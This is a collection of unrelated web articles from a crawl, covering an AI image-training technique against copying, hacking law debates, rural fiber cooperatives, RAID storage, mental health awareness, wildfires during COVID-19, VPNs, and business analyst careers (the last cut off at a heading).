Leveraging a dataset comprising 3,000 images of celebrities, the researchers observed a transformative effect when employing the new framework. Whereas traditional diffusion models trained on uncorrupted data merely replicated training examples, Ambient Diffusion ushered in a paradigm shift. By systematically corrupting the training data—randomly masking up to 90% of individual pixels in an image—and retraining the model, the researchers achieved striking results. The generated samples retained their high quality while exhibiting distinct deviations from the original training images. This pivotal achievement underscores the framework’s capacity to strike a balance between performance and originality. Giannis Daras, a promising graduate student in computer science who spearheaded the research effort, emphasizes the framework’s inherent flexibility. “Our framework enables precise control over the trade-off between memorization and performance,” he explains. “As the level of corruption during training escalates, the model’s tendency to memorize the training set diminishes.” This adaptive mechanism offers a pathway to solutions that, while potentially altering performance metrics, steer clear of generating mere noise—a testament to the framework’s robustness and efficacy. The development of Ambient Diffusion epitomizes academia’s commitment to advancing AI technology in alignment with societal imperatives—a focal point at The University of Texas at Austin, which has designated 2024 as the “Year of AI.” With contributions from esteemed institutions such as the University of California, Berkeley, and MIT, this collaborative endeavor exemplifies the synergistic potential of interdisciplinary research in shaping the future of artificial intelligence. The introduction of the Ambient Diffusion framework signifies a pivotal step towards ethical AI development, particularly in addressing legal concerns surrounding image replication. By prioritizing originality and adaptability, this innovation not only mitigates copyright infringement risks but also opens doors to enhanced scientific and medical applications. As AI continues to evolve, businesses must remain vigilant in adopting frameworks like Ambient Diffusion to navigate ethical complexities and foster responsible innovation.
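For readers who want to see what "randomly masking up to 90% of individual pixels" looks like in practice, here is a minimal NumPy sketch of that corruption step alone. It is an illustration under assumptions (the image size, masking level, and function name are made up); it is not the authors' code and it omits the actual diffusion training.

```python
import numpy as np

def corrupt(image, mask_fraction=0.9, seed=None):
    """Zero out a random fraction of pixels; return the corrupted image and the mask.

    Training objectives in approaches like this also need the mask, so the
    model knows which pixels were observed and which were hidden.
    """
    rng = np.random.default_rng(seed)
    keep = rng.random(image.shape[:2]) >= mask_fraction   # True where a pixel survives
    mask = keep[..., None] if image.ndim == 3 else keep    # broadcast over color channels
    return image * mask, mask

# Example: corrupt a random 64x64 RGB image at the 90% level described above.
img = np.random.rand(64, 64, 3).astype(np.float32)
corrupted, mask = corrupt(img, mask_fraction=0.9, seed=0)
print(f"{(~mask).mean():.0%} of pixels masked")
```

Training only ever sees the corrupted image and its mask, never the clean original, which is the intuition behind why the resulting model cannot simply memorize and regurgitate its training images.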
<urn:uuid:1dbe2671-9efa-4c7c-999d-48e95594fd99>
CC-MAIN-2024-38
https://multiplatform.ai/researchers-at-the-university-of-texas-at-austin-developed-ambient-diffusion-a-framework-for-training-ai-models-on-corrupted-images-to-prevent-replication-of-copyrighted-material/
2024-09-18T18:39:50Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00676.warc.gz
en
0.884577
1,056
2.828125
3
You're about to embark on a reading journey you may never have taken before, so let's begin, shall we? In the modern era of technology, hackers are arguably playing an increasingly important role. They have been making a significant impact in various industries and across many aspects of our lives. As a result, debates about the legal implications of hacking and related regulations are actively occurring. This article will discuss the current legal and regulatory issues that come with hacking, exploring both the positive and negative implications of this activity.
One of the most important legal issues associated with hacking is copyright infringement. Hackers often attempt to access systems with copyright-protected content without permission from the copyright holder(s). This can result in serious civil liability for those found responsible, as well as potential criminal repercussions if there is alleged criminal intent or motive. Many countries are now strengthening their laws against copyright infringement and introducing harsher punishments for violators. For example, China recently ratified its Copyright Law, which significantly stiffened penalties for offenders caught infringing upon copyrighted materials online; such punishments include jail time or hefty fines. As such, it's important for people to be aware of these laws so they can stay compliant while benefiting from new technologies.
Another major debate revolves around computer crime legislation, which exists in many regions throughout the world to protect citizens' digital privacy and security rights. In some cases, these laws give additional protection to corporations due to increased vulnerability caused by hackers attempting to gain unauthorized access to data or systems owned by companies; however, critics have argued that these laws are unnecessarily harsh and draconian when applied to individual users rather than organizations or commercial entities. Additionally, while some believe that regulating hacker activities may be an effective way to prevent malicious attacks on enterprises' networks, others fear that such measures could lead to further criminalization of hackers who act out of curiosity or simply want to challenge their skillset rather than cause harm or steal data.
Furthermore, debates about the ethical implications of hacking are also taking place with regard to cyber security laws (CSLs). Proponents argue that CSLs help protect individuals from malicious attacks by cyber-criminals seeking financial gain; however, some opponents view CSLs as an intrusion into personal liberties due to their broad scope when it comes to crackdowns on activities deemed illegal under these laws (e.g., accessing secured networks without authorization). For example, countries like China have adopted "Digital Rights Management" regimes where corporations have right-of-entry over citizens' information if they suspect any security threats, without necessarily proving any actual malicious intent before taking action against hackers – creating a system ripe with potential abuse-of-power scenarios, depending on implementation factors and the specific circumstances surrounding individual cases prosecuted under such frameworks. 
Finally, while discussions are ongoing regarding how best to legislate hacker activities, key questions remain unanswered – for instance, whether existing regulations need more expansive definitions that classify activities according to the risks they pose, rather than simply categorizing them by whether a particular provision was breached. While lawmakers continue debating solutions that seek to balance how internet usage should be legally allowed or restricted, much still comes down to the discretion of local governments to define what constitutes an illegal action within their respective territories. That discretion risks limiting people's ability to innovate, because some types of conduct end up condemned as harmful regardless of intent, simply because they involve circumventing rule sets to reach a desired result faster and more efficiently, with as little disruption to infrastructure as possible, after the work of investigating the details has been done beforehand.
<urn:uuid:464e9dea-2765-4ae7-8bc4-4f92c50b5b9f>
CC-MAIN-2024-38
https://hacklido.com/blog/189-discussions-on-current-legal-and-regulatory-issues-in-hacking
2024-09-20T01:40:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652073.91/warc/CC-MAIN-20240919230146-20240920020146-00576.warc.gz
en
0.933574
704
3.015625
3
BROADBAND BREAKFAST INSIGHT: Once again, the folks at the Institute for Local Self Reliance have produced another standout report on how to get better broadband to those parts of American that are not served by the major incumbents. This report focuses on the role that cooperatives are playing, and can continue to play, in making sure that the rural regions of our country are not left behind in the race for next-generation connectivity. The Fiber Future is Cooperative: Policy Brief On Rural Cooperative Fiber Deployment, from Institute for Local Self Reliance Rural communities across the United States are already building the Internet infrastructure of the future. Using a 20th century model, rural America is finding a way to tap into high-speed Internet service: electric and telephone cooperatives are bringing next-generation, Fiber-to-the-Home (FTTH) networks to their service territories. This policy brief provides an overview of the work that cooperatives have already done, including a map of the cooperatives’ fiber service territories. We also offer recommendations on ways to help cooperatives continue their important strides. Download the policy brief, Cooperatives Fiberize Rural America: A Trusted Model For The Internet Era here. Key Facts & Figures Farmers first created utility cooperatives because large private companies did not recognize the importance of connecting rural America to electricity or telephone service. Now, these cooperatives are building fiber infrastructure. Almost all of the 260 telephone cooperatives and 60 electric cooperatives are involved in fiber network projects. As of June 2016, 87 cooperatives offer residential gigabit service (1,000 Mbps) to their members. Rural cooperatives rely on more than 100 years of experience. The cooperative approach does not stop with rolling out rural infrastructure, but ensures that their services remain viable and affordable. The majority of Montana and North Dakota already have FTTH Internet access, thanks to rural cooperatives. Even one of the poorest counties in the country (Jackson County, Kentucky) has FTTH through a telephone cooperative. AT&T receives about $427 million each year in rural subsidies to bring Internet service to rural America, but AT&T does not invest in rural fiber networks.
<urn:uuid:dadbb780-2e8f-4247-81e0-a6ff5c1b492c>
CC-MAIN-2024-38
https://broadbandbreakfast.com/new-resource-from-institute-for-local-self-reliance-on-building-fiber-in-rural-america/
2024-09-07T20:03:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00776.warc.gz
en
0.941165
449
2.53125
3
Stepping into the data storage realm, one of the phrases that generates a hive of activity is RAID, an acronym for Redundant Array of Independent Disks. Like the backbone of the human body, RAID offers significant integral support to modern data storage systems. This piece aims to demystify RAID, delving into its rich history, the nuts and bolts of its operation, and the rationale behind its critical role in data storage. An exploration into the numerous benefits of using RAID, from improved data protection to enhanced performance, and comprehensive guidance on its practical implementation beckons. Moreover, glancing an eye into the future, an examination of emerging trends and future projections about RAID promises to enhance the understanding of this focal point in data storage. Technology is evolving at a rapid pace, turning sci-fi dreams into absolute realities. Amongst these numerous technological advancements, one that’s taken the tech world by storm is the RAID system– a Redundant Array of Independent Disks. This technology is essentially shaping and redefining data storage. Accordingly, every tech enthusiast needs to know about RAID, given its significance for reliable and efficient data storage. In layman’s terms, RAID is a method of storing the same data across multiple hard disks to achieve a blend of enhanced speed, data protection, and improved performance. Such an interplay of hard disks acts like a cohesive system, ensuring your data is not reliant on a single device and is practically insulated against disk failures. RAID is not a single strategy but a composite plethora of methods, each possessing its unique set of advantages. For instance, RAID 0 splits data across multiple drives, improving speed and performance. Meanwhile, RAID 1 duplicates the same data on two hard disks, offering complete redundancy and backup. RAID 5, a commonly adopted approach, distributes parity along with the data, boosting data protection. For those looking at maximizing speed and data protection simultaneously, RAID 10 is the answer, as it combines the capabilities of RAID 0 and RAID 1. In the digital age, the importance of data can hardly be understated. It’s the basis for decision-making trend prediction and holds incredible monetary value. This makes RAID a crucial player in the tech world. Its principal benefit lies in its redundancy. A hard drive failure can lead to catastrophic losses. By providing multiple copies of data, RAID protects against such potential nightmares. RAID boosts overall performance and speed. It divides the workload among multiple disks. This process, known as ‘striping’, enhances data access and read-write speeds. Consequently, RAID has become an indispensable tool for data-intensive tasks and processes. RAID also offers a cost-effective data storage solution. It allows the use of cheaper, smaller disks in an array without compromising on storage capacity or performance. However, keep in mind that RAID is not a universal magic solution. It does not replace the need for regular data backups, nor does it protect against data corruption or viruses. That said, when implemented correctly, RAID can raise the reliability and performance of storage systems to previously unimaginable heights. In a world where data is the new currency, technology like RAID is more than just a matter of convenience or speed. It becomes a necessity, a guardian of our digital treasures. 
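To make the striping idea mentioned above a little more concrete, here is a toy sketch of how a RAID 0-style layout deals data out across member disks. It is purely illustrative: real controllers work on disk blocks, and the chunk size and disk count here are arbitrary assumptions.

```python
def stripe(data: bytes, num_disks: int, chunk_size: int = 4):
    """Deal fixed-size chunks of data round-robin across the member disks."""
    disks = [bytearray() for _ in range(num_disks)]
    for i in range(0, len(data), chunk_size):
        disks[(i // chunk_size) % num_disks].extend(data[i:i + chunk_size])
    return disks

# Sixteen bytes spread over four disks: each disk holds a quarter of the data,
# and reads and writes can hit all four disks in parallel.
for n, d in enumerate(stripe(b"ABCDEFGHIJKLMNOP", num_disks=4)):
    print(f"disk {n}: {bytes(d)}")
```

The speed comes from that parallelism, but notice that no single disk holds a complete copy of anything, which is exactly why RAID 0 on its own offers no protection against a drive failure.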
By understanding and leveraging its capabilities, we can take our relationship with technology to the next level – one of minimal manual intervention, maximum automation, and unparalleled efficiency. Dive into the world of RAID today and open doors to accelerated performance and unparalleled data protection. Benefits of RAID In a rapidly evolving digital landscape, RAID, or Redundant Array of Independent Disks, establishes a reliable platform for data storage and retrieval. One of the salient advantages of RAID is its impactful role in data management and recovery. In essence, RAID’s real strength lies in its innate ability to counter data loss. This feat is achieved through redundancy; ‘mirroring’ and ‘parity’ are the two fundamental principles enabling this function. In RAID systems, redundancy ensures that multiple copies of data are stored across different drives. As such, even if one disk fails, the data remains available on other disks, thereby mitigating the risk of losing critical information. Mirroring, primarily utilized in RAID 1 and RAID 10, is about duplicating the entire data from one drive onto another. If one drive malfunctions, the system continues to operate seamlessly with undisturbed data access. Moreover, recovery becomes straightforward and relatively speedy since the secondary drive remains an intact copy of the failed one. Parity, integrated into RAID 5 and RAID 6 systems, offers an even more robust solution for data recovery. It stems from creating a ‘parity bit.’ This unique piece of information can reconstruct the entire chunk of data from the remaining drives in case of a disk failure. Although parity can incur a slight performance cost, it grants a strong guard against data loss and provides an efficient recovery process. Above and beyond the realm of data recovery, RAID positions itself as an enabler of effective data management. Given RAID’s capability of splitting and distributing data across multiple drives (striping), the system allows concurrent data reading and writing operations. Performance-wise, this means data can be accessed and processed at a faster rate, boosting overall system efficiency. Furthermore, depending on the RAID level, one can achieve a balance between cost, performance, and data protection, providing more flexibility in managing diverse data requirements. However, RAID is not the silver bullet for all data woes. For instance, while RAID provides recovery options from hardware failures, it might not aid in software corruption or user mishandling scenarios. For this reason, maintaining regular data backups becomes imperative for comprehensive information security. Worth noting is the rise of cloud-based solutions and hybrid systems that harp on RAID’s strengths and can counter its drawbacks. In today’s digitalized world, RAID continues to serve as an ace in effective data management and recovery. When the stakes are high, RAID provides a unique blend of data protection, improved performance, and cost-effectiveness. That’s why this bit of ‘old school’ tech remains highly pertinent, even in the flexible, diverse digital era today. With advanced systems, embracing the full potential of RAID beyond traditionally perceived boundaries is the road to creating an integrated, resilient, and high-performing digital ecosystem. It’s time to delve deeper into the nuts and bolts of how RAID can be implemented in your system. 
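Before turning to implementation, here is a toy illustration of the parity mechanism described above. It is a sketch under simplifying assumptions: real RAID 5 rotates parity across all member disks and operates on fixed-size blocks, whereas this example only shows how XOR lets one missing chunk be rebuilt from the survivors.

```python
def xor_chunks(chunks):
    """XOR equal-length byte chunks together; used both to compute parity and to rebuild."""
    out = bytearray(len(chunks[0]))
    for chunk in chunks:
        for i, b in enumerate(chunk):
            out[i] ^= b
    return bytes(out)

data_chunks = [b"ABCD", b"EFGH", b"IJKL"]   # data spread over three disks
parity = xor_chunks(data_chunks)            # parity chunk stored on a fourth disk

# Simulate losing the second disk and rebuilding its contents from the rest plus parity.
surviving = [data_chunks[0], data_chunks[2], parity]
rebuilt = xor_chunks(surviving)
assert rebuilt == data_chunks[1]
print("rebuilt chunk:", rebuilt)            # b'EFGH'
```

The same property is what lets a degraded array keep serving reads while a replacement drive is rebuilt, at the cost of the extra XOR work the article refers to as a slight performance penalty.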
This may seem intimidating but fear not – implementing RAID is much less complex than it might initially appear, and the benefits are undoubtedly worth it. To be successful in embracing RAID, begin with understanding the hardware requirements. Despite the virtual nature of RAID, hardware is critical. A RAID controller, typically available as either an integrated motherboard component or a separate expansion card, will be necessary to facilitate the interaction of multiple hard drives. The disk drives themselves are also a key consideration. Remember that different RAID levels could demand a higher number of drives. The drive’s speed, capacity, brand, and model should be identical for optimal drive array performance and stability. Once the hardware is sorted, choose the RAID level that fits the system’s needs in terms of performance and data protection. RAID configuration should be determined based on your specific requirements. Whether it’s RAID 1 for mirroring and redundancy, RAID 0 for a striped set without fault tolerance, or RAID 10 for a combination of both, the chosen setup has to reflect the system’s needs accurately. Ultimately, setting up RAID involves configuring the RAID controller through the system BIOS (Basic Input/Output System) or UEFI (Unified Extensible Firmware Interface). Once in the configuration utility, create a new array, select the necessary drives, and pick the RAID level. Remember to carry out this important step during the system’s initial setup or after backing up any important data. Next, install the operating system, ensuring that all updates and patches are applied to avoid any known issues with RAID. Often, RAID controllers require a specific driver that may not be natively included with the OS. Don’t forget to install any necessary driver for the RAID controller during the OS installation process. After the operating system has been installed, the RAID array should show as a single, united disk drive. The RAID controller will manage the distribution of data, duplicating, splitting, or combining it depending on the configured RAID level. An integral part of implementing RAID is managing it. Be sure to monitor the RAID arrays routinely to detect any possible issues early. Most RAID controllers provide software for monitoring RAID health. Last but not least, remember that RAID is not an ultimate data protection solution. Even in operable RAID arrays, hard drives can still fail unpredictably. So, regular off-site data backups and verifying the integrity of those backups is an essential complement to employing RAID in a system. In conclusion, the benefits of implementing RAID in a system are immense as RAID offers superior performance, provides data redundancy, and enhances the speed of data storage and retrieval. With sound knowledge, meticulous planning, and careful implementation – achieving a successful RAID setup is entirely within reach. RAID’s Future Perspectives Emerging Trends Impacting RAID Technology With an existing foundation about RAID and its broad scope, let’s dive into what the future holds for RAID, primarily shaped by emerging trends and technologies. The rise of solid-state drives (SSDs), offering superior performance and resilience over traditional hard drives, will significantly impact RAID configurations. SSDs inherently accommodate the input/output demands placed on RAID systems, delivering superior lifespan, speed, and reduced power consumption. 
Consequently, RAID types that distribute parity data across the array, like RAID 5 and RAID 6, can benefit hugely from the enhanced endurance of SSDs. However, because SSDs are more expensive, the cost savings associated with RAID might not be as pronounced. Meanwhile, the prevalence of Big Data and Internet of Things (IoT) devices collect and process vast amounts of data. To manage these demands, enterprises will look to implement larger RAID arrays to provide adequate storage and performance. It’s vital, however, to ensure adequate fault tolerance in these configurations, as a single drive failure could take days to rebuild and severely degrade performance. Further, the advent of cloud technology and cloud storage services adds a new dimension to data redundancy and backup. Technically, RAID and cloud storage are two sides of the same coin, both aimed at ensuring the reliability and accessibility of data. The utilization of RAID alongside cloud-based backups is an innovative step towards enhanced data protection, offering each method’s unique advantages. Artificial intelligence could play a part in the future of RAID arrays as well. Machine learning algorithms could be used to optimize and manage RAID arrays dynamically, ensuring maximum performance and reliability based on changing user needs and workloads. Last but not least, the proliferation of Software-Defined Storage (SDS) will revolutionize RAID configurations as it abstracts the software services from the physical storage hardware, offering flexible and independent RAID scalability. With SDS and RAID together, the storage pool can be resilient against single and multiple failures with an optimized balance between storage capacity, performance, and protection. And so, as RAID technology adjusts to accommodate these emerging trends, its longevity may not be at risk, as some have postulated. Rather, the role of RAID is evolving from its conventional objectives towards a more adaptable, dynamic tool in the broad landscape of data protection and redundancy. By walking hand in hand with these trends, RAID is poised to continue its critical role in the new digital age – ever-changing but definitely enduring. RAID’s future is indisputably intertwined with the development of technology and the escalating demands in data storage. The discussion thus far underscores RAID’s vitality, with its multifaceted benefits of data redundancy, augmented performance, and robust data protection. However, to fully harness its potential, meticulous consideration is needed when implementing different RAID configurations and technologies. As technology surges forward, RAID systems will inevitably adapt and evolve in tandem, responding to emerging trends and advancements. Looking ahead, RAID will undeniably pivot towards new horizons in data storage, shaping and impacting myriad facets of our digital existence.
<urn:uuid:21870873-f5fe-4f8b-bffa-70df788533b3>
CC-MAIN-2024-38
https://cyberexperts.com/hard-drive-raid/
2024-09-07T21:36:26Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00776.warc.gz
en
0.908711
2,523
3.1875
3
Most of us feel that we've lost control over our lives right now. City and school re-openings are unknown, and for many, life seems to have been turned upside down with no clear end in sight. Even with all the chaos and uncertainty going on, there is one thing we can control: our efforts to safeguard our mental health and wellbeing.
Today, February 3, 2022, marks the annual Time to Talk Day. This social movement is designed to help create supportive communities where people are able to start conversations around mental health and feel empowered to seek help when they need it. This day aims to encourage people not only to be open about their personal struggles, but to do so without the fear or stigma that is so often associated with this topic.
- Nearly 1 in 5 adults live with mental illness
- 9 out of 10 people with mental health problems say that stigma and discrimination have a negative effect on their lives
- Suicide is the 10th leading cause of death in the U.S.
- Members of LGBTQ+ communities are almost 3 times more likely to experience a mental health condition such as major depression or generalized anxiety disorder
- 1 in 6 children aged 5-16 are likely to have a mental health problem
- 55% of 16-25 year olds say they had seen their doctor about mental health at some point in their lives
We all go through tough times, but there is no simple way of knowing if someone is struggling with their mental health. Many mental illnesses have been identified and defined, including depression, anxiety, obsessive compulsive disorder and many more. Although there are common symptoms specific to certain mental health challenges, not everyone reacts the same way, making it difficult to spot. Understanding how to respond to someone with mental health issues is crucial and can make a world of difference to someone who may be feeling alone. Here are some ways you can show your support:
- Listen: Set time aside with no distractions. Ask open-ended questions to allow them to share their experiences with you and help them feel heard
- Celebrate wins: Every day is a challenge. Celebrate their accomplishments, no matter how big or small they may be
- Do your research: Educate yourself and learn more about mental health. Understanding these challenges will help you to understand their experiences and be aware of those who are at risk
- Check in regularly: Those struggling with mental health often already feel like a burden to others. Check in regularly, keep them company, and always remind them that they are loved and that you are there to support them in any way possible
If you or someone you know is experiencing mental health issues and is seeking support, speak to your doctor, tell someone you trust, or contact mental health services. For more blogs related to mental health, check out the following:
<urn:uuid:cc4cfd7d-26c2-4e8b-bd32-3f75b062cb7d>
CC-MAIN-2024-38
https://www.netsweeper.com/education-web-filtering/time-talk-day-2022
2024-09-07T20:50:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00776.warc.gz
en
0.97077
568
3.109375
3
Wildfire Season and COVID-19 Author: Madison Littin Around this time every year, the news begins showing footage of raging fires, burnt homes, and exhausted families and firefighters. Although peak wildfire season depends on the state, most wildfires in the U.S. occur during the summer to early fall months. As wildfires appear to be getting worse, a new challenge presents itself in 2020: the coronavirus pandemic. Every agency – from the governmental level to private businesses – will need to be aware of this lingering threat and address their usual incident management plans as such. Points of Consideration May Be: Health Precautions for the Front-line Firefighters, public officials, vendors, and other responders coordinating wildfire efforts are usually placed in large camps. However, with social distancing requirements and lack of proper hygiene, responders need to find other ways of safely running camps. Some agencies have opted to turn hotels into their incident command centers or create larger camps with limited close contact. Firefighters are at greater risk of catching COVID-19 as well due to smoke inhalation and group suppression efforts; it’s potentially dangerous to expose a whole camp to the virus, which could limit the amount of responders to fight the actual fire. Are there policies in place to check the health of responders on a daily basis? What back up options are there in case the virus greatly reduces the number of firefighters? Will there be adequate medical supplies for firefighters? Reduced Mitigation and Response Efforts As the coronavirus pandemic swept the nation, spring clearing of underbrush and reduced funding have left forests in prime condition for severe fires. Instead of focusing on wildfire planning and recruiting, firefighters were out receiving increased 911 calls. Now in the summer (and as fall approaches), coronavirus cases are still rising as researchers expect a second wave. Will wildfire camps have enough support from firefighters as they’re fighting two disasters on two fronts? Will other counties/agencies/states be able to provide additional firefighters? Will there still be a flow of funding towards fighting fires as the pandemic continues on? Additional Stress on Civilians As of this writing, more than 45 million Americans have filed for unemployment since the pandemic began. Residents – sick, unemployed, or otherwise struggling – may not have the resources to flee or follow evacuations. Losing your home and all your possessions is devastating; losing all of this during a global pandemic is even worse. Where will agencies be sending evacuees? Will social distancing and safety guidelines be in place during evacuations? Will families have proper support systems to recover financially and physically? If stay-at-home orders/quarantine return, what plans are in place for those recently displaced? Additionally, small businesses have suffered greatly from the shutdowns. Will they have the financial means to recover from a second disaster? Are their emergency plans updated with regards to wildfires? Enhanced Communications and Monitoring Both pandemics and wildfires are long, constantly evolving crises; the pandemic has been ongoing since February (with no signs of stopping), and wildfires can last for weeks or months at a time. A shift in wind direction or a new outbreak can mean an entire change in response efforts. 
Authorities will need to be extra vigilant and more communicative, both internally among wildfire crews and externally to citizens and businesses. How will changes in pandemic response affect wildfire suppression efforts, and vice versa? Will different methods of communication have to be used? How do you balance messages of concern for the pandemic and for wildfires?

One unique takeaway from a combined pandemic/wildfire season is the dual use of masks, as many people are already wearing them to help prevent the spread of COVID-19. However, only N95 masks are capable of protecting the wearer from wildfire smoke – and smoke can be widespread; it's not uncommon to see people several towns away from the fire's edge wearing masks as the wind carries the smoke. It's important that enough masks are produced for first responders, front-line medical workers, and citizens. Has the supply chain been restored after the initial wave of COVID-19? Will there be enough masks to meet the evolving demands of wildfire smoke and coronavirus response?

The Fire Management Board has already created several guidelines for fighting wildfires during the coronavirus pandemic, and it serves as a great reference when updating your emergency incident management software. It's important to keep up to date on best practices as well as to maintain a sense of empathy. Times are hard, and we need everyone to work together in order to weather these crises.
<urn:uuid:d41159bd-1726-478f-9c6e-10100b09b328>
CC-MAIN-2024-38
https://www.fusionrm.com/blogs/wildfire-season-and-covid-19/
2024-09-11T13:07:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651387.63/warc/CC-MAIN-20240911120037-20240911150037-00476.warc.gz
en
0.956098
945
2.578125
3
In today’s digital age, where online privacy is becoming increasingly important, Virtual Private Networks (VPNs) have emerged as an essential tool for protecting our personal information and ensuring a secure online experience. But what exactly are VPNs and how do they play a significant role in online security? Let’s take a closer look. Firstly, let’s define what a VPN is. Essentially, a VPN is a service that creates a secure, encrypted connection between your device and the internet. It works by routing your internet traffic through a remote server operated by the VPN provider, thereby masking your IP address and encrypting your data. This makes it almost impossible for anyone to intercept or view your online activities. Now that we know what a VPN does, let’s explore how it enhances online security. One of the primary advantages of using a VPN is that it prevents unauthorized access to your personal information. When connected to a VPN, your data is encrypted, making it extremely difficult for cybercriminals and hackers to intercept and decrypt your sensitive information, such as passwords, credit card details, and browsing history. Furthermore, VPNs also play a significant role in protecting your online identity. By masking your IP address with that of the VPN server, you can surf the web anonymously, without leaving behind a trace of your online activities. This adds an extra layer of security when accessing public Wi-Fi networks, which are notorious for being prime targets for hackers looking to steal personal information. Another aspect of online security that VPNs address is geo-blocking. Many websites and streaming platforms enforce regional restrictions, limiting access to content based on your location. With a VPN, you can bypass these restrictions by connecting to a server in a different country. This not only allows you to access a broader range of content, but it also adds an extra level of privacy as your true location remains hidden. It’s important to note that VPNs are not foolproof and do have limitations. While they provide security for your online activities, they do not protect against malware or viruses. Therefore, it’s crucial to combine the use of a VPN with other cybersecurity measures, such as using anti-virus software and practicing safe browsing habits. In conclusion, VPNs are powerful tools that protect your online privacy and enhance your overall online security. By encrypting your data, masking your IP address, and allowing you to bypass geo-blocks, they provide a safer and more secure online experience. However, it’s important to remember that VPNs are just one piece of the cybersecurity puzzle, and it’s essential to adopt a holistic approach to ensure comprehensive protection in the digital world.
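The article's core claim is that a VPN encrypts the traffic between your device and the VPN server. As a rough illustration of just the encryption step, here is a minimal Python sketch using the third-party cryptography package's Fernet recipe. The key handling, the sample payload, and the package choice are illustrative assumptions: real VPN protocols (IPsec, OpenVPN, WireGuard) negotiate keys per session and encrypt at the packet level rather than calling a library like this.

```python
# pip install cryptography
from cryptography.fernet import Fernet

# In a real VPN, a key like this is negotiated during a handshake;
# here we simply generate one to stand in for the shared tunnel key.
key = Fernet.generate_key()
tunnel = Fernet(key)

# A stand-in for one chunk of your web traffic.
request = b"GET /account HTTP/1.1\r\nHost: bank.example\r\n\r\n"

ciphertext = tunnel.encrypt(request)    # what an eavesdropper on the path would see
plaintext = tunnel.decrypt(ciphertext)  # what the VPN server recovers and forwards

assert plaintext == request
print("on the wire:", ciphertext[:40], b"...")
```

Even this toy shows why interception fails: without the key, the ciphertext reveals nothing about the request, which is exactly the property a VPN tunnel provides for your whole connection.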
<urn:uuid:cc667518-c5a9-473d-98d5-dc7ed6c5cdbb>
CC-MAIN-2024-38
https://garage4hackers.com/understanding-vpns-and-their-role-in-online-security/
2024-09-12T19:59:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00376.warc.gz
en
0.934852
549
3.0625
3
Business analysis and business analyst are very well-known terms nowadays. But do you know what exactly a business analyst is, or who a business analyst is? Here you will get the answers to these questions.

Business analysts are people who play a key role in the progress of any industry. They are the ones responsible for maintaining coordination between the IT cell and the business. They collect all the business-related data, combine it, and form conclusions about what is good for the business and what is not. In this way, they make progress faster and easier.

In this blog we will mainly discuss:
- Who is a business analyst
- What a business analyst does
- Skills needed to become a good business analyst
- Difference between a business analyst and data analyst
- How to become a business analyst

Who is a Business Analyst
Business analysts have become a crucial part of recent business scenarios. Are you also among those who think that the role of business analysts is simply to make money for the company? That is true, but not directly: the actions and decision-making of business analysts influence the financial prospects of the company.

Business analysts work inside a company to assess current systems and create strategic plans. This requires deep knowledge of both the particular business and industry trends. A critical part of the business analyst job is therefore conveying plans between internal departments and external stakeholders.

The role of the business analyst is to introduce change in an organization. Change may include cost avoidance, identifying new opportunities, recognizing and creating new benefits, and much more. Business analysts create or update computer systems to meet business requirements. They are the ones who provide requirements to the IT department to deliver the new technological system, and they assist in the testing and adoption of that system.

Companies employ business analysis for several reasons: to understand the structure and dynamics of the organization in which a system is to be deployed, and to guarantee that the client, end user, and developers have a common understanding of the target organization.

(Most related: 8 Most Popular Business Analysis Techniques used by Business Analyst)

Business Analyst Skills
Basically, a good business analyst should understand that a combination of both hard and soft skills is needed, and analysts are judged on these skills. Being a successful business analyst means having a mixture of many skills and being flexible in a shifting environment. So, let's have a look at some of the skills you need if you want to become a good business analyst.

First, you have to know how to deal with different people. You need to supervise team members, forecast the budget, support team members with difficulties, and handle many more such tasks. You have to feel confident in a leadership role to earn acceptance for strategies from administrators in the corporation.

Business analysts may also use a wide range of technical programs, including programs for charting, data crunching, wireframing, requirements management, and presenting results.
Increasingly, business analysts are expanding their technical proficiency with knowledge of computer programming, big data mining techniques, and database administration. In simple words, if a business analyst works in the IT department, some technical fundamentals are required, such as operating systems, hardware capabilities, database concepts, networking, and more.

(Recommended blog: Dark side of Information Technology (IT) Industry)

Excellent analytical skills distinguish a good business analyst. A substantial part of the business analyst position involves analyzing data, workflows, and user or stakeholder input to determine which course of action will best address the business issue. Strong analytical skills are essential to executing the business analyst's job properly.

Business analysts have to work in groups, so they need to be good at communication. They have to receive information and present it to wide-ranging stakeholders in the corporation, translate and negotiate between groups, and communicate explanations clearly. Fluent language skills and written communication abilities are integral to thriving in a business analyst career, so anyone who wants to be a good business analyst has to improve their writing and speaking skills.

Business knowledge and critical thinking
Business analysts must understand many aspects of the organization they work for. They should be able to understand the roles of various people and departments, and how these departments interact with and depend on one another. They should also understand the organization's position in the broader industry. This business knowledge then allows them to effectively analyze data points and build strategic plans for the future.

There are many more skills needed to become a good business analyst: you need to understand your objectives, have good listening skills, be able to run stakeholder meetings, hone your presentation skills, learn time management, develop your modeling skills, manage stakeholders, and more.

What Does a Business Analyst Do?
A business analyst examines sets of data, searching for ways to increase efficiency in a corporation. In doing so, the business analyst frequently acts as a liaison between different divisions in an organization, finding ways to streamline processes throughout the corporation. The business analyst must be able to communicate well with these different groups in the company, sometimes acting as a spokesperson and presenting solutions in ways that colleagues and stakeholders will understand. Business analysts may deliver a wide range of solutions, including new strategies, data models, flowcharts, or strategic plans. A professional business analyst plays a massive part in pushing a company toward efficiency, productivity, and profitability.

Business analysts take part in four primary kinds of analysis:
- Strategic planning: identifying the changing requirements of an organization.
- Business model analysis: defining policies and market approaches.
- Process design: standardizing workflows.
- Systems analysis: interpreting business requirements for the IT department.

There are different business analyst roles; analysts can come from any area, and the position varies based on the area.
Business analysts are accordingly categorized into numerous roles, such as Business Analyst, Systems Analyst, Business Process Analyst, IT Business Analyst, Business Systems Analyst, Usability or UX Analyst, Data Analyst, and Functional Architect.

Business Analyst vs Data Analyst
